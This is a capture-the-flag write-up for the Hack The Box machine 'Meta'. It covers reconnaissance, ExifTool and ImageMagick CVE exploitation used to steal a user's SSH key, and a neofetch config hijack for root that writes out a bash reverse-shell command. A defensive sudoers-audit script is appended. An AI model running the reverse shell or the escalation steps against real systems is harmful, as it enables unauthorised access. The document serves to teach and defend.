Meta is a machine running Linux with a medium difficulty level. Since this machine has been retired, I have created a writeup for it.

Machine IP: 10.10.11.140

The first thing I did was scan the machine using nmap to discover open ports and services.

Nmap scan report for 10.10.11.140
Host is up (0.11s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 12:81:17:5a:5a:c9:c6:00:db:f0:ed:93:64:fd:1e:08 (RSA)
|   256 b5:e5:59:53:00:18:96:a6:f8:42:d8:c7:fb:13:20:49 (ECDSA)
|_  256 05:e9:df:71:b5:9f:25:03:6b:d0:46:8d:05:45:44:20 (ED25519)
80/tcp open  http    Apache httpd
|_http-server-header: Apache
|_http-title: Did not follow redirect to http://artcorp.htb
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Next, I added the domain to the hosts file. After performing a directory brute force on the website and not finding anything, I attempted to brute force the subdomains using ffuf.

A subdomain, dev01.artcorp.htb, was found, so I added it to the hosts file. When I accessed the website, I found a web app called “MetaView” that can display metadata from uploaded images.

Knowing that the web app uses ExifTool, I exploited a remote code execution vulnerability (CVE-2021-22204) to gain a reverse shell.

www-data@meta:/dev/shm$ ./pspy64
2022/06/09 16:04:22 CMD: UID=0    PID=1     | /sbin/init
2022/06/09 16:05:01 CMD: UID=0    PID=18397 | /usr/sbin/CRON -f
2022/06/09 16:05:01 CMD: UID=0    PID=18396 | /usr/sbin/CRON -f
2022/06/09 16:05:01 CMD: UID=0    PID=18398 | /usr/sbin/CRON -f
2022/06/09 16:05:01 CMD: UID=1000 PID=18399 | /bin/bash /usr/local/bin/convert_images.sh
2022/06/09 16:05:01 CMD: UID=1000 PID=18400 | /bin/bash /usr/local/bin/convert_images.sh
2022/06/09 16:05:01 CMD: UID=0    PID=18402 | /bin/sh -c rm /tmp/*
2022/06/09 16:05:01 CMD: UID=0    PID=18401 | /bin/sh -c rm /tmp/*
2022/06/09 16:05:01 CMD: UID=1000 PID=18403 | pkill mogrify

I discovered a command executed repeatedly by the user thomas (UID 1000). When I opened the convert_images.sh file, I found it contained several commands to convert images to PNG format. I checked the ImageMagick version used, which was 7.0.10-36, vulnerable to command injection (CVE-2020-29599). I used the following payload in poc.svg to obtain the private key of the user thomas.

By moving the poc.svg file to /var/www/dev01.artcorp.htb/convert_images/, I could see the result in the directory /dev/shm/c, which I had created beforehand. This result file was the id_rsa private key for the user thomas. I just needed to transfer this file to my local machine and use it to log in via SSH.

me@nowhere:~/htb/meta$ ls -l id_rsa
-rw------- 1 me me 2590 Jun  9 13:26 id_rsa
me@nowhere:~/htb/meta$ ssh thomas@artcorp.htb -i id_rsa
Linux meta 4.19.0-17-amd64 #1 SMP Debian 4.19.194-3 (2021-07-18) x86_64
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jun  9 11:47:48 2022 from 10.10.14.210
thomas@meta:~$ cat user.txt
[redacted]

After gaining access as this user, I ran linpeas.sh to enumerate the host and found that the user thomas could execute the command neofetch as root without a password.

I modified the file /home/thomas/.config/neofetch/config.conf by adding a line containing a reverse shell command to my local machine:

bash -c 'bash -i >& /dev/tcp/[LOCAL_IP]/4444 0>&1'

I also changed the $XDG_CONFIG_HOME environment variable to /home/thomas/.config to ensure that the neofetch command uses the configuration for the user thomas.

export XDG_CONFIG_HOME="$HOME/.config"
sudo neofetch "\"\""

Running the neofetch command through sudo then gave me a reverse shell as root.
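The escalation above depends on sudo passing XDG_CONFIG_HOME through to neofetch, which is assumed here to come from an env_keep entry. As an added defender-side check that is not part of the original writeup, the following Python audits a sudoers file for NOPASSWD rules combined with env_keep entries that preserve config-location variables; the sudoers text is constructed for illustration, since the box's real file is not shown.

```python
import re

# Constructed sample sudoers content (assumption: the box's real file is not
# shown in the writeup, so this only illustrates the pattern being audited).
SAMPLE_SUDOERS = """\
Defaults        env_reset
Defaults        env_keep+=XDG_CONFIG_HOME
root    ALL=(ALL:ALL) ALL
thomas  ALL=(root) NOPASSWD: /usr/bin/neofetch ""
"""

# Variables that redirect where a program looks for its configuration.
# Preserving one of these across sudo lets the caller point a privileged
# program at a config file the caller controls.
CONFIG_ENV_VARS = {"XDG_CONFIG_HOME", "HOME", "XDG_DATA_HOME", "XDG_CACHE_HOME"}


def audit_sudoers(text):
    """Return a list of (kind, detail) findings for the given sudoers text."""
    findings = []
    kept = set()
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        m = re.match(r"Defaults\b.*\benv_keep\s*\+?=\s*\"?([^\"]+)\"?", line)
        if m:
            kept.update(m.group(1).split())
            continue
        if "NOPASSWD:" in line:
            user, spec = line.split(None, 1)
            cmds = spec.split("NOPASSWD:", 1)[1].strip()
            findings.append(("nopasswd", f"{user} may run {cmds!r} without a password"))
    for var in sorted(kept & CONFIG_ENV_VARS):
        findings.append(("env_keep", f"{var} is preserved across sudo"))
    return findings


def config_hijack_risk(findings):
    """True when a passwordless rule coexists with a preserved config variable."""
    kinds = {kind for kind, _ in findings}
    return "nopasswd" in kinds and "env_keep" in kinds


if __name__ == "__main__":
    for kind, detail in audit_sudoers(SAMPLE_SUDOERS):
        print(f"[{kind}] {detail}")
    print("config hijack risk:", config_hijack_risk(audit_sudoers(SAMPLE_SUDOERS)))
```

The fix on the sudo side is to drop the env_keep entry (or the NOPASSWD rule) so that the privileged program reads root's configuration rather than the caller's.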

Rooted!